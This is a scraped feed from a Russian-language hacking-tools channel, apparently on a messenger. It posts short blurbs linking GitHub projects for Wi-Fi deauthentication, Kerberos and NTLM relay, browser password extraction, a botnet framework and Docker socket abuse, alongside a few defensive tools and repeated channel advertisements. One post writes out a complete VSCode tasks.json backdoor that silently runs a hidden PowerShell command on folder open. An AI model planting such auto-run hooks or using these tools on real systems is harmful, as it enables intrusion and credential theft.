Пока нет отзывов. Будьте первым, кто поделится своим опытом!
Последние посты
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
Wifi-deauth
Инструмент атаки deauth на Wi-Fi сети, который отключает все устройства от целевой сети Wi-Fi (2,4 ГГц и 5 ГГц).
https://github.com/flashnuke/wifi-deauth
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
332
7
0
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
KrbRelayEx — это инструмент для эксплуатации уязвимостей в Kerberos и NTLM, позволяющий проводить атаки на основе релея аутентификации. Он предназначен для пентестеров и специалистов по кибербезопасности, изучающих слабые места в инфраструктуре Active Directory.
Репозиторий содержит различные техники атаки, включая:
- Релеинг Kerberos — использование переданных учетных данных для обхода ограничений.
- NTLM релеинг — манипуляции с аутентификацией для повышения привилегий.
- Отладка и тестирование — инструменты для исследования механизмов защиты.
https://github.com/decoder-it/KrbRelayEx
📲 https://max.ru/xakkep_1
🔐
165
3
Хакер Free
28 мар. 2026 г., 10:30
🚀 Подборка полезных IT каналов в Max
Системное администрирование, DevOps 📌
https://max.ru/i_odmin Все для системного администратора
https://max.ru/bash_srv Bash Советы
https://max.ru/sysadminof Книги для админов, полезные материалы
https://max.ru/i_odmin_book Библиотека Системного Администратора
https://max.ru/i_devops DevOps: Пишем о Docker, Kubernetes и др.
1C разработка 📌
https://max.ru/odin1c_rus Cтатьи, курсы, советы, шаблоны кода 1С
Программирование C++📌
https://max.ru/cpp_lib Библиотека C/C++ разработчика
Программирование Python 📌
https://max.ru/python_of Python академия.
https://max.ru/BookPython Библиотека Python разработчика
Java разработка 📌
https://max.ru/bookjava Библиотека Java разработчика
GitHub Сообщество 📌
https://max.ru/githublib Интересное из GitHub
Базы данных (Data Base) 📌
https://max.ru/database_info Все про базы данных
Фронтенд разработка 📌
https://max.ru/frontend_1 Подборки для frontend разработчиков
Библиотеки 📌
https://max.ru/programmist_of Книги по программированию
https://max.ru/proglb Библиотека программиста
https://max.ru/bfbook Книги для программистов
Программирование 📌
https://max.ru/bookflow Лекции, видеоуроки, доклады с IT конференций
https://max.ru/itmozg Программисты, дизайнеры, новости из мира IT
https://max.ru/php_lib Библиотека PHP программиста 👨🏼💻👩💻
Шутки программистов 📌
https://max.ru/itumor Шутки программистов
Защита, взлом, безопасность 📌
https://max.ru/thehaking Канал о кибербезопасности
https://max.ru/xakkep_1 Хакер Free
Книги, статьи для дизайнеров 📌
https://max.ru/odesigners Статьи, книги для дизайнеров
Математика 📌
https://max.ru/Pomatematike Канал по математике
https://max.ru/phismat_1 Обучающие видео, книги по Физике и Математике
Вакансии 📌
https://max.ru/progjob Вакансии в IT
Мир технологий 📌
https://max.ru/mir_teh Канал для любознательных
Бонус 📌
https://max.ru/piterspb_78 Свежие новости Санкт-Петербурга
https://max.ru/mockva_life Свежие новости Москвы
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
PowerShell-Hunter — инструмент для охоты на артефакты в Windows 🕵️♂️
Этот проект помогает специалистам по безопасности и цифровой криминалистике анализировать систему с помощью PowerShell.
Он собирает артефакты, связанные с активностью пользователей, сетевыми подключениями, процессами, реестром и файлами, облегчая поиск признаков компрометации.
Сценарии PowerShell-Hunter хорошо структурированы и позволяют быстро автоматизировать рутинные задачи расследования. Это мощный инструмент для DFIR-аналитиков, пентестеров и специалистов SOC.
https://github.com/MHaggis/PowerShell-Hunter
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
317
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
WatchYourLAN
Легкий сетевой IP-сканер. Может использоваться для оповещения о новых хостах и отслеживания истории хостов в режиме онлайн/оффлайн
Особенности:
- Отправка уведомлений при обнаружении нового устройства
- Мониторинг истории онлайн/оффлайн устройств
- Ведение списка всех устройств в сети
- Отправка данных в InfluxDB2 для создания панели мониторинга в Grafana
https://github.com/aceberg/WatchYourLAN
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
319
2
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
HackBrowserData
Это утилита с открытым исходным кодом на Go, предназначенная для извлечения данных из популярных браузеров. Она позволяет быстро получить пароли, cookies, историю просмотров и другие сохранённые данные.
Поддерживает работу с Chrome, Edge, Firefox, Opera и многими другими браузерами на Windows, macOS и Linux. Результаты можно экспортировать в JSON или CSV, что удобно для последующего анализа.
https://github.com/moonD4rk/HackBrowserData
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
483
5
Хакер Free
28 мар. 2026 г., 10:30
📷 Photo
Malwoverview - это инструмент для первичного реагирования, используемый для охоты на угрозы. Он предоставляет разведывательную информацию из таких источников, как VirusTotal, Hybrid Analysis, URLHaus, Polyswarm, Malshare, AlienVault, Malpedia, MalwareBazaar, ThreatFox, Triage, InQuest, VxExchange и IPInfo, а также может сканировать устройства Android с проверкой через VirusTotal.
https://github.com/alexandreborges/malwoverview
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
494
4
Хакер Free
22 мар. 2026 г., 10:42
🚀 Подборка полезных IT каналов в Max
Системное администрирование, DevOps 📌
https://max.ru/i_odmin Все для системного администратора
https://max.ru/bash_srv Bash Советы
https://max.ru/sysadminof Книги для админов, полезные материалы
https://max.ru/i_odmin_book Библиотека Системного Администратора
https://max.ru/i_devops DevOps: Пишем о Docker, Kubernetes и др.
1C разработка 📌
https://max.ru/odin1c_rus Cтатьи, курсы, советы, шаблоны кода 1С
Программирование C++📌
https://max.ru/cpp_lib Библиотека C/C++ разработчика
Программирование Python 📌
https://max.ru/python_of Python академия.
https://max.ru/BookPython Библиотека Python разработчика
Java разработка 📌
https://max.ru/bookjava Библиотека Java разработчика
GitHub Сообщество 📌
https://max.ru/githublib Интересное из GitHub
Базы данных (Data Base) 📌
https://max.ru/database_info Все про базы данных
Фронтенд разработка 📌
https://max.ru/frontend_1 Подборки для frontend разработчиков
Библиотеки 📌
https://max.ru/programmist_of Книги по программированию
https://max.ru/proglb Библиотека программиста
https://max.ru/bfbook Книги для программистов
Программирование 📌
https://max.ru/bookflow Лекции, видеоуроки, доклады с IT конференций
https://max.ru/itmozg Программисты, дизайнеры, новости из мира IT
https://max.ru/php_lib Библиотека PHP программиста 👨🏼💻👩💻
Шутки программистов 📌
https://max.ru/itumor Шутки программистов
Защита, взлом, безопасность 📌
https://max.ru/thehaking Канал о кибербезопасности
https://max.ru/xakkep_1 Хакер Free
Книги, статьи для дизайнеров 📌
https://max.ru/odesigners Статьи, книги для дизайнеров
Математика 📌
https://max.ru/Pomatematike Канал по математике
https://max.ru/phismat_1 Обучающие видео, книги по Физике и Математике
Вакансии 📌
https://max.ru/progjob Вакансии в IT
Мир технологий 📌
https://max.ru/mir_teh Канал для любознательных
Бонус 📌
https://max.ru/piterspb_78 Свежие новости Санкт-Петербурга
https://max.ru/mockva_life Свежие новости Москвы
Хакер Free
21 мар. 2026 г., 03:10
📷 Photo
🏰 Прокачиваем скиллы взлома Active Directory с GOAD
Active Directory - это сердце большинства корпоративных сетей. Умение находить в нем уязвимости (и понимать, как их закрывать) - абсолютный мастхэв для любого пентестера и Red Teamer'а.
Ловите мощный инструмент для тренировок: GOAD (Game of Active Directory) от команды Orange Cyberdefense.
💻 Что это такое?
GOAD - это проект для автоматизированного развертывания полноценной, уязвимой по дизайну лаборатории Active Directory. Вам больше не нужно тратить дни на скучную ручную настройку виртуалок, контроллеров домена, пользователей и политик просто для того, чтобы потестить эксплойт.
🔥 Главные фичи лаборатории:
• Полная автоматизация: Среда поднимается скриптами с помощью Vagrant, Ansible, Terraform или Docker. Поддерживается развертывание локально (VirtualBox/VMware), на сервере (Proxmox) или в облаке (AWS/Azure).
• Реалистичная архитектура: В зависимости от выбранного сценария, лаба включает в себя несколько лесов, доменов и настроенных доверительных отношений (trusts).
• Классические уязвимости: Внутри спрятана куча мисконфигураций, которые сплошь и рядом встречаются в реальных корпоративных сетях.
• Широкий вектор атак: Это идеальный полигон для использования BloodHound и отработки таких техник, как Kerberoasting, AS-REP Roasting, NTLM Relay, Pass-the-Hash, DCSync, атак на службы сертификатов (AD CS) и многого другого.
Прямое попадание для тех, кто готовится к сертификациям вроде OSCP/CRTP, играет в хардкорные CTF, работает в Red Team или просто хочет на практике понять, как ломается инфраструктура на базе Windows.
https://github.com/Orange-Cyberdefense/GOAD
#hacking #redteam #activedirectory #pentest #goad #infosec
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
Хакер Free
19 мар. 2026 г., 02:46
📷 Photo
Hacker Roadmap — это детальная дорожная карта для тех, кто хочет развиваться в области кибербезопасности.
Репозиторий содержит подборку ресурсов по основам безопасности, сетевым технологиям, эксплойтам, реверс-инжинирингу и многому другому. Отличный старт для новичков и полезный справочник для практиков.
https://github.com/Hacking-Notes/Hacker-Roadmap
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
757
8
Хакер Free
19 мар. 2026 г., 02:46
🎥 Video
WiFi-password-stealer
Функционал:
- Получение списка сохранённых сетей Wi-Fi.
- Извлечение паролей из системного хранилища.
- Вывод результатов в читаемом виде (сеть + пароль).
Технически это демонстрация работы с системными командами (netsh wlan show profiles) и их парсинг в Python. Подобные проекты часто используют для:
- Восстановления забытых паролей на своих устройствах.
- Изучения работы системных команд и автоматизации.
⚠️ Важно: Использование таких скриптов для доступа к чужим сетям без разрешения — незаконно.
https://github.com/AleksaMCode/WiFi-password-stealer
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
658
3
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
Suricata — это IDS/IPS-движок с уклоном в хардкор.
Зачем нужно: режет трафик на куски, палит подозрительные пакеты, знает, как выглядят настоящие атаки (по сигнатурам) и умеет вычислять нетипичное поведение (по аномалиям). Парсит всё подряд — от HTTP и TLS до SMB и FTP. Можно вытаскивать файлы из трафика, логировать в JSON, слать всё это в Elastic, Zeek или куда душе угодно.
Пишется на C/C++, живёт на многопоточке, идеально вписывается в любой сенсор на границе сети. Любит скорость, большие нагрузки и логику «сделай сам».
Открытый код, норм дока, активный саппорт от OISF. Можно пилить свои правила, мониторить, внедряться, мутить кастомную аналитику.
https://github.com/OISF/suricata
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
802
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
Discover
Пользовательские bash-скрипты для автоматизации различных задач тестирования на проникновение, включая разведку, сканирование, перечисление и создание вредоносных полезных нагрузок с использованием Metasploit.
Предназначены для использования в Kali Linux.
Пример скрипта в комментах 👇
https://github.com/leebaird/discover
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
725
3
Хакер Free
15 мар. 2026 г., 15:03
🎥 Video
🔒 VSCode-Backdoor: внедрение бэкдора через .vscode/tasks.json
VSCode позволяет автоматически выполнять задачи через файл tasks.json. Злоумышленник может воспользоваться этим, чтобы внедрить скрытый бэкдор, запускающий произвольный код при открытии папки в VSCode.
Техника внедрения
1. Создайте директорию .vscode в корне проекта (если она ещё не существует).
2. Добавьте файл tasks.json со следующим содержимым:
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
}
}
]
}
В этом примере при открытии папки в VSCode скрытно запускается calc.exe.
https://github.com/SaadAhla/VSCode-Backdoor
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
758
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
🌐 Geospy
Инструмент на Python, использующий геолокационный сервис на базе ИИ от Graylark для определения места, где были сделаны фотографии.
https://github.com/atiilla/geospy
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
967
6
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
Web-Check
Получите представление о внутреннем устройстве указанного веб-сайта: выявляйте потенциальные векторы атак, анализируйте архитектуру сервера, просматривайте конфигурации безопасности и узнайте, какие технологии использует сайт.
В настоящее время панель управления отображает: информацию об IP, SSL-цепочку, записи DNS, файлы cookie, заголовки, сведения о домене, правила обхода поисковыми роботами, карту страниц, местонахождение сервера, журнал перенаправлений, открытые порты, трассировку маршрута (traceroute), расширения безопасности DNS, производительность сайта, трекеры, связанные имена хостов и углеродный след. Следите за обновлениями — скоро добавлю ещё больше!
Цель заключается в том, чтобы помочь вам легко понять, оптимизировать и защитить ваш веб-сайт.
https://web-check.as93.net/
https://github.com/Lissy93/web-check
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
895
Хакер Free
15 мар. 2026 г., 15:03
🎥 Video
Ghostport
Высокопроизводительный инструмент для подмены портов, написанный на Rust. Сбивайте с толку порт-сканеры с помощью динамической эмуляции сервисов на всех портах. Поддерживает настраиваемые сигнатуры, эффективную асинхронную обработку и простое перенаправление трафика.
Особенности
- Динамическая эмуляция портов: отвечает на порт-сканирование набором правдоподобных сигнатур сервисов.
- Настраиваемые сигнатуры: легко добавлять или изменять сигнатуры сервисов через простой текстовый файл.
- Высокая производительность: построен на Rust и Tokio для эффективной асинхронной обработки соединений.
- Гибкое логирование: режимы debug, verbose и quiet для разных сценариев использования.
- Простота использования: простой интерфейс командной строки с разумными настройками по умолчанию.
https://github.com/vxfemboy/ghostport
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
931
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
Bkcrack — это инструмент для взлома ZIP-архивов, зашифрованных с использованием классического шифрования PKZIP.
Он позволяет:
▫️Восстановить внутренние ключи, зная как минимум один открытый и зашифрованный файл из архива.
▫️Расшифровать другие файлы из архива.
▫️Подделать содержимое архива, сохранив при этом корректную подпись CRC и структуру.
▫️Встроить подделанный файл обратно в архив.
Инструмент реализован на C++17 и работает на Linux, Windows и macOS.
Установка:
git clone https://github.com/kimci86/bkcrack.git
cd bkcrack
make
Использование:
1. Получи открытый файл, который соответствует зашифрованному — например, ту же версию .txt, .xml и т.п.
2. Запусти bkcrack с путями к обоим файлам — он восстановит ключи.
3. С этими ключами можно расшифровывать, изменять и даже создавать новые архивы, которые будут выглядеть легитимными.
https://github.com/kimci86/bkcrack
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
1,060
Хакер Free
15 мар. 2026 г., 15:03
📷 Photo
jfscan
Супербыстрое сканирование портов и обнаружение сервисов с использованием Masscan и Nmap. Сканируйте крупные сети с помощью Masscan и используйте возможности скриптов Nmap для получения информации о сервисах.
Уникальные возможности
- Откройте мощь Nmap с помощью Masscan для масштабного сканирования
- Сканируйте цели, используя доменные имена и другие форматы
- Выводите результаты в удобном формате домен:порт
- Передавайте результаты в другие инструменты и получайте их обратно с помощью режима stdin/stdout
- Наслаждайтесь легкостью сканирования с автоматической настройкой скорости пакетов для Masscan
- Генерируйте профессиональные отчеты в формате Nmap XML
- Сканируйте IPv6-цели без проблем
- Оставайтесь сосредоточенными на цели с управлением охватом
https://github.com/nullt3r/jfscan
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
Tookie — это инструмент для OSINT (разведки с использованием открытых источников), позволяющий получать информацию о людях. Он использует различные API и веб-сайты для сбора данных на основе имени, ника, email или номера телефона.
Возможности:
* Поиск по нику, имени, email и номеру телефона
* Использование сторонних API (например, Hunter. io, HaveIBeenPwned, SocialSearcher и др.)
* Проверка утечек, социальных сетей и контактной информации
* Кроссплатформенность (Windows, Linux, macOS)
Установка:
git clone https://github.com/Alfredredbird/tookie-osint
cd tookie-osint
pip install -r requirements.txt
Использование:
python3 tookie.py --username example_user
Аргументы:
* --username — никнейм цели
* --name — имя цели
* --email — email адрес
* --phone — номер телефона
https://github.com/Alfredredbird/tookie-osint
📲 https://max.ru/odin1c_rus https://max.ru/xakkep_1
🔐
1,260
Хакер Free
12 мар. 2026 г., 15:42
Дорогие друзья, с Новым Годом!!!
1,130
19
0
Хакер Free
11 мар. 2026 г., 00:51
📷 Photo
BYOB (Build Your Own Botnet) — это проект с открытым исходным кодом, который позволяет исследователям и специалистам по кибербезопасности изучать методы, используемые вредоносным ПО, в контролируемой среде. Проект предоставляет модульную инфраструктуру для создания и управления ботнетом, позволяя пользователям:
- Создавать кастомные вредоносные исполняемые файлы
- Удалённо управлять заражёнными машинами через веб-интерфейс
- Выполнять команды, загружать и исполнять произвольные скрипты Python
- Интегрировать модули для кейлоггинга, скриншотов, удалённого доступа и других техник
⚠️ Проект создан исключительно в образовательных целях. Использование его за пределами тестовой или лабораторной среды может нарушать законодательство.
https://github.com/malwaredllc/byob
📲 https://max.ru/xakkep_1
🔐
1,480
Хакер Free
5 мар. 2026 г., 18:06
📷 Photo
https://otus.ru/lessons/revers-engineering/?utm_source=telegram&utm_medium=cpm&utm_campaign=revers&utm_term=xakep_1&utm_content=mql_lesson-29-01-2026_usp-universal1_revers_text_no-headline_aida_long_banner_banner_white_standart&erid=2VtzqxMPdD5#event-6798
Работа с виртуальной памятью в защищённом режиме — фундамент для анализа руткитов, буткитов и сложных уязвимостей в ядре Windows. Понимание того, как реально устроены таблицы страниц и права доступа, критично для реверса и системного анализа.
На открытом уроке разберём различия между физической и виртуальной памятью, устройство таблиц страниц (PTE/PDE) и возможности их модификации из драйвера. Поговорим об исключениях, обработке падений и покажем упрощённую практическую демонстрацию разыменования NULL-указателя.
Урок подойдёт вирусным аналитикам, исследователям ИБ и разработчикам системного ПО, которым важно понимать внутренние механизмы ядра Windows.
→ Этот вебинар проходит в формате открытого урока курса «Reverse Engineering»: https://vk.cc/cTAIIb
Реклама. ООО «Отус онлайн‑образование», ОГРН 1177746618576
Хакер Free
2 мар. 2026 г., 01:51
📷 Photo
🕵️♂️ DockerSpy — слежка за контейнерами
Инструмент для удалённого шпионажа за Docker-контейнерами через сокет docker.sock. Позволяет:
🔹 просматривать запущенные контейнеры
🔹 извлекать переменные окружения
🔹 получать доступ к файловой системе
🔹 выполнять команды внутри контейнеров
📌 Работает при наличии доступа к docker.sock — напоминание, почему важно защищать его как root-доступ.
👉 https://github.com/UndeadSec/DockerSpy
📲 https://max.ru/xakkep_1
🔐
1,420
4
Хакер Free
2 мар. 2026 г., 01:51
📷 Photo
GEF (GDB Enhanced Features) — это набор расширений для отладки в GDB, написанный на Python. Он предоставляет мощные инструменты для анализа, отладки и реверс-инжиниринга, фокусируясь на современных возможностях и улучшении взаимодействия с GDB.
Основные особенности:
- Автоматическое определение архитектуры и контекста выполнения
- Расширенные команды для анализа памяти, регистров, стеков и heap
- Поддержка различных архитектур: x86, x86-64, ARM, AARCH64, MIPS, PowerPC, SPARC, RISC-V
- Интеграция с инструментами вроде Capstone, Unicorn, Keystone
- Поддержка создания собственных команд и расширений
- Хорошая совместимость с Python 3 и последними версиями GDB
Установка и использование просты: достаточно скачать скрипт gef.py и подключить его в .gdbinit.
Проект активно развивается и поддерживается, включая подробную документацию и примеры использования.
https://github.com/hugsy/gef
📲 https://max.ru/xakkep_1
🔐
1,280
Хакер Free
2 мар. 2026 г., 01:51
🔥 Новая коллекция BOF для AD-операций! 🔥
Знакомьтесь с P0142/LDAP-Bof-Collection - обширным набором Beacon Object Files (BOF), заточенных под LDAP - операции в инфраструктурах Active Directory. Это настоящий швейцарский нож для "красных команд" (red teams) и пентестеров! 🛡️
Что внутри?
- 40+ BOF-команд для комплексного перечисления (enumeration) и повышения привилегий в домене.
- Поддержка LDAPS (порт 636) с автоматическим принятием сертификатов.
- Работа со стандартным LDAP (порт 389), включая подписание и запечатывание.
- Автоматическое определение Distinguished Names (DN) и имен пользователей.
- Создан для Adaptix C2, но совместим с любым C2, поддерживающим запуск BOF.
BOF - это скомпилированные фрагменты кода, которые запускаются прямо в памяти процесса агента C2. Они позволяют выполнять сложные задачи Active Directory (например, поиск уязвимых объектов, создание пользователей, управление ACL) с минимальным следом и более скрытно, чем обычные исполняемые файлы.
👉 Изучайте и внедряйте в свои операции: https://github.com/P0142/LDAP-Bof-Collection
📲 https://max.ru/xakkep_1
🔐
1,320
5
Хакер Free
2 мар. 2026 г., 01:51
📷 Photo
🔎 Snaffler — инструмент для поиска чувствительной информации в Windows-доменах
Snaffler — это инструмент для охоты на ценные артефакты внутри Windows-доменов.
Инструмент сканирует общие ресурсы в сети и ищет файлы, которые могут содержать чувствительные данные — пароли, ключи, конфигурации, резервные копии и т.д. Результаты можно фильтровать по различным признакам, включая типы файлов, ключевые слова и шаблоны имен.
На практике это значит, что вы быстро найдете:
- .config файлы с паролями,
- резервные копии баз данных,
- приватные ключи,
- и многое другое, что может быть использовано атакующими.
Полезно как для оффенсивных целей, так и для аудита безопасности.
https://github.com/SnaffCon/Snaffler
📲 https://max.ru/xakkep_1
🔐
1,220
Хакер Free
14 февр. 2026 г., 06:24
🛡 CVEScannerV2 — инструмент для поиска уязвимостей (CVE) на целевых хостах
Этот инструмент позволяет быстро находить известные уязвимости на основе открытых портов и служб, используя данные Nmap и API http://cveapi.com/.
🔧 Как это работает:
1. Сканируете цель с помощью Nmap (-sV для сбора инфы о версиях).
2. Загружаете XML-отчёт в CVEScannerV2.
3. Инструмент анализирует версии ПО и проверяет наличие CVE.
📌 Пример:
nmap -sV -oX scan.xml
python3 cvescanner.py scan.xml
💡 Это может пригодиться для первичного анализа безопасности в ходе пентестов или аудита инфраструктуры.
https://github.com/scmanjarrez/CVEScannerV2
📲 https://max.ru/xakkep_1
🔐
1,060
4
0
Хакер Free
11 февр. 2026 г., 21:24
🛠Btop++ — это высокопроизводительный монитор ресурсов, написанный на C++, который предоставляет детальную информацию о загрузке процессора, использовании памяти, активности дисков, сетевой активности и процессах. Он является продолжением проектов bashtop и bpytop, предлагая улучшенную производительность и расширенные возможности.
Основные возможности btop++:
🔹Интуитивно понятный интерфейс с поддержкой мыши и клавиатуры.
🔹Подробная информация о выбранных процессах.
🔹Фильтрация и сортировка процессов, включая древовидное отображение.
🔹Отправка сигналов процессам.
🔹Настраиваемые параметры через меню интерфейса.
🔹Автоматическое масштабирование графиков сетевой активности.
🔹Отображение активности и скорости ввода/вывода для дисков.
🔹Поддержка различных тем оформления.
Проект активно развивается, в последнюю версия v1.4.0 добавлена поддержка Intel GPU и NetBSD.
💻Для пользователей Windows доступна специальная версия — btop4win, которая предоставляет аналогичный функционал и поддерживает мониторинг GPU и температуры процессора при использовании версии с Open Hardware Monitor Report.
https://github.com/aristocratos/btop
📲 https://max.ru/xakkep_1
🔐